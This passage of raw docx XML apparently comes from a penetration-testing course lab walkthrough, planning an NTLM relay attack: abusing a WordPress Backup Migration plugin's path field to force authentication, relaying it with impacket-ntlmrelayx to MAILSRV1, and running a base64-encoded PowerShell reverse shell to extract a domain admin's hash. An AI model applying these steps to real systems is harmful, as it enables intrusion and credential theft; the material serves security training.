        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll begin with the configured users:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2108200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 20: Daniela is the only WordPress user" id="236" name="image227.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 20: Daniela is the only WordPress user" id="0" name="image227.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId990"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2108200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 20: Daniela is the only WordPress user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 20 shows </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the only user. Next, let's check </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Settings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2095500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 21: General WordPress settings" id="88" name="image89.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 21: General WordPress settings" id="0" name="image89.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId991"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2095500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 21: General WordPress settings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress Address (URL)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Site Address (URL)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are DNS names as we assumed. All other settings in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Settings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are mostly default values. Let's review the installed plugins next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1993900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 22: Installed WordPress Plugins" id="224" name="image216.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 22: Installed WordPress Plugins" id="0" name="image216.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId992"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1993900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 22: Installed WordPress Plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 22 shows three plugins, but only</w:t>
      </w:r>
      <w:hyperlink r:id="rId993">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId994">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Backup Migration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enabled. Let's click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which brings us to the plugin configuration page. Clicking through the menus and settings, we discover the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 23: Backup Migration plugin settings" id="135" name="image142.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 23: Backup Migration plugin settings" id="0" name="image142.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId995"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2171700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 23: Backup Migration plugin settings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 23 shows that we can enter a path in this field, which will be used for storing the backup. We may abuse this functionality to force an authentication of the underlying system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's pause here for a moment and plan our next steps. Now, there are two promising attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first is to upload a malicious WordPress plugin to INTERNALSRV1. By preparing and uploading a web shell or reverse shell, we may be able to obtain code execution on the underlying system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the second attack vector, we must review the BloodHound results again and make some assumptions. As we have discovered, the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account has an active session on INTERNALSRV1. Based on this session, we can assume that this user account is used to run the WordPress instance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, it's not uncommon that the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> accounts across computers in a domain are set up with the same password. Let's assume this is true for the target environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DEA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also learned that the domain administrator </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">beccy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has an active session on MAILSRV1 and therefore, the credentials of the user may be cached on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DEB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Due to SMB signing being disabled on MAILSRV1 and INTERNALSRV1, a relay attack is possible if we can force an authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DEC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we identified the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field in the WordPress </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup Migration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin containing the path for the backup destination. This may allow us to force such an authentication request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DED">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on this information, let's define a plan for the second attack vector. First, we'll attempt to force an authentication request by abusing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the Backup Migration WordPress plugin on INTERNALSRV1. By setting the destination path to our Kali machine, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId996">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId997">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">impacket-ntlmrelayx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to relay the incoming connection to MAILSRV1. If our assumptions are correct, the authentication request is made in the context of the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account on INTERNALSRV1, which has the same password as the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account on MAILSRV1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DEE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this attack is successful, we'll obtain privileged code execution on MAILSRV1, which we can then leverage to extract the NTLM hash for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">beccy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and therefore, meet one of the primary goals of the penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DEF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the second attack vector not only results in code execution on a single system, but also provides a potential vector to achieve one of the goals of the penetration test, we'll perform the relay attack first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's set up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-ntlmrelayx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before we modify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the WordPress plugin. We'll use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--no-http-server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-smb2support</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to disable the HTTP server and enable SMB2 support. We'll specify the external address for MAILSRV1, 192.168.50.242, as target for the relay attack. By entering the external address, we don't have to proxy our relay attack via Proxychains. Finally, we'll base64-encode a</w:t>
      </w:r>
      <w:hyperlink r:id="rId998">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId999">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PowerShell reverse shell oneliner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that will connect back to our Kali machine on port 9999 and provide it as a command to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1248"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
